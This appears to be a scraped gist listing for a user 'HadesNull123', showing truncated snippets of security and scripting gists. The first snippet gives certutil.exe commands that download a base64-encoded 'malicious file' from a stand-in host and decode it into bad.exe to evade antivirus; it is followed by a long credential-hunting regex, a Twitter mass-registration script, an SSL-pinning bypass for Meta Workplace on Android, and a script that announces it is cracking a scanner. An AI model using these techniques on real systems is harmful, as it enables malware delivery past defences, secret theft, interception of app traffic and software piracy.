Security researchers

HadesNull HadesNull123

# certutil.exe: bypass AV on download + base64 decoding
# First, base64-encode the malicious file so that, to an edge device, it just appears as harmless text.
# Then, once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64-encoded file
# into the executable. https://www.browserling.com/tools/file-to-base64
# This is illustrated in Xavier Mertens' handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
HadesNull123 / twitter-register.py
Created October 19, 2023 08:21 — forked from ceres-c/twitter-register.py
Attempt at registering Twitter accounts with Python Requests. NOT working.
#! /bin/python
import json
import random
import re
import string
import time
import urllib.parse
from threading import Thread
from time import sleep, time_ns
HadesNull123 / wokplace-ssl-pinning-bypass.md
Created September 9, 2023 04:10 — forked from xdavidhu/wokplace-ssl-pinning-bypass.md
Bypassing SSL Pinning in Facebook/Meta Workplace (Android)

Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications. Thank you Imre Rad for helping me analyze the binary.

How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs. This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.

The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944. The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

HadesNull123 / acu.sh
Created July 17, 2023 02:18 — forked from vncloudsco/acu.sh
To run, type ``` bash acu.sh xrsec/awvs ```
#!/usr/bin/env bash
# set -ex
Echo_c() {
    # -e makes bash's builtin echo interpret the \033 colour escapes
    echo -e "\033[1;33m$1\033[0m"
}
check() {
Echo_c " Starting cracking"
HadesNull123 / UNLICENSE
Created June 10, 2023 15:50 — forked from Tey/UNLICENSE
HTTP proxy digest authentication for requests lib which works with HTTPS websites
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
HadesNull123 / yt1080.md
Created August 29, 2020 16:16 — forked from lelandbatey/yt1080.md
YouTube 1080p Download Script

YouTube 1080p Downloader

The Problem

It used to be that you could directly download any YouTube video in any quality you wanted, as a single .mp4 file. However, around a year ago, YouTube switched from the "single file stream" to "DASH" streaming, which streams the video and the audio to you as two separate streams that are played in sync with each other in the YouTube player.

It's still possible to download YouTube videos as a single file, but YouTube only offers that for qualities up to 720p. So you can't download "single file stream" videos in 1080p or higher.

HadesNull123 / Liberal Regex Pattern for Web URLs
Created August 29, 2020 03:09 — forked from gruber/Liberal Regex Pattern for Web URLs
Liberal, Accurate Regex Pattern for Matching Web URLs
The regex patterns in this gist are intended only to match web URLs -- http,
https, and naked domains like "example.com". For a pattern that attempts to
match all URLs, regardless of protocol, see: https://gist.github.com/gruber/249502
# Single-line version:
(?i)\b((?:https?:(?:/{1,3}|[a-z0-9%])|[a-z0-9.\-]+[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|s